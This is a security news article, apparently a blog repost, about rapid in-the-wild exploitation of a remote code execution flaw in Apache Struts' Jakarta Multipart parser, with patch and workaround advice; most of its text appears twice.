Hackers managed to exploit vulnerability in the open source Apache Struts development framework. A fix had however been made available at the beginning of the week.
Between the discovery of vulnerabilities and their exploitation by hackers, there is often a delay allowing developers to propose in the interval a security patch. While the delay may be short, it does provide a shooting window in which the fastest pirates can interfere as unfortunately has been the case with the last flaw targeting Apache Struts. Indeed, attackers have succeeded in exploiting the recent patched flaw found in this open source development framework and allowing remote execution of malicious code on web servers.
On Monday, developers of Apache Struts corrected a high vulnerability in the parser (synthetic analyzer) of the Jakarta Multipart framework. A few hours later, a flaw exploit appeared on Chinese-language websites, followed almost immediately by real attacks, according to researchers at Cisco Systems. This vulnerability is very easy to exploit and allows attackers to execute system commands with user privileges running web server processes. If it is configured to run as root, the system is completely compromised.
What is even worse is that the Java web application running on the server does not even need the file upload function to be implemented via the Jakarta Multipart parser to be vulnerable. According to Qualys researchers, the mere presence on the web server of this component, which is part of the Apache Struts framework by default, is enough to allow the exploit. Companies using this framework on their servers should as soon as possible upgrade to versions 2.3.32 or 2.5.10.1.
Cisco Talos researchers have observed a large number of exploitations events. Some of them only run the Linux whoami command to determine the privileges of the web server user. Others go further and shut down the Linux firewall before downloading an ELF executable to the server. "Payloads have varied but include an IRC bouncer, a DDoS bot and a sample linked to botnet bill portals", Talos researchers said in a blog post. Worldwide, there are 35 million web applications that accept filetype downloads: action, and a large proportion of them are likely vulnerable.
It is unusual to see attacks begin so quickly after the announcement of a flaw and it has not yet been clearly established whether its operation may have occurred in some closed circles before Monday. Users who can not immediately apply patches can use a temporary workaround to create a Servlet filter for Content-Type. Web application firewall rules to block these requests are also available from different vendors.
Between the discovery of vulnerabilities and their exploitation by hackers, there is often a delay allowing developers to propose in the interval a security patch. While the delay may be short, it does provide a shooting window in which the fastest pirates can interfere as unfortunately has been the case with the last flaw targeting Apache Struts. Indeed, attackers have succeeded in exploiting the recent patched flaw found in this open source development framework and allowing remote execution of malicious code on web servers.
On Monday, developers of Apache Struts corrected a high vulnerability in the parser (synthetic analyzer) of the Jakarta Multipart framework. A few hours later, a flaw exploit appeared on Chinese-language websites, followed almost immediately by real attacks, according to researchers at Cisco Systems. This vulnerability is very easy to exploit and allows attackers to execute system commands with user privileges running web server processes. If it is configured to run as root, the system is completely compromised.
Stopping the Linux Firewall on Order
What is even worse is that the Java web application running on the server does not even need the file upload function to be implemented via the Jakarta Multipart parser to be vulnerable. According to Qualys researchers, the mere presence on the web server of this component, which is part of the Apache Struts framework by default, is enough to allow the exploit. Companies using this framework on their servers should as soon as possible upgrade to versions 2.3.32 or 2.5.10.1.
Cisco Talos researchers have observed a large number of exploitations events. Some of them only run the Linux whoami command to determine the privileges of the web server user. Others go further and shut down the Linux firewall before downloading an ELF executable to the server. "Payloads have varied but include an IRC bouncer, a DDoS bot and a sample linked to botnet bill portals", Talos researchers said in a blog post. Worldwide, there are 35 million web applications that accept filetype downloads: action, and a large proportion of them are likely vulnerable.
It is unusual to see attacks begin so quickly after the announcement of a flaw and it has not yet been clearly established whether its operation may have occurred in some closed circles before Monday. Users who can not immediately apply patches can use a temporary workaround to create a Servlet filter for Content-Type. Web application firewall rules to block these requests are also available from different vendors.
No comments:
Post a Comment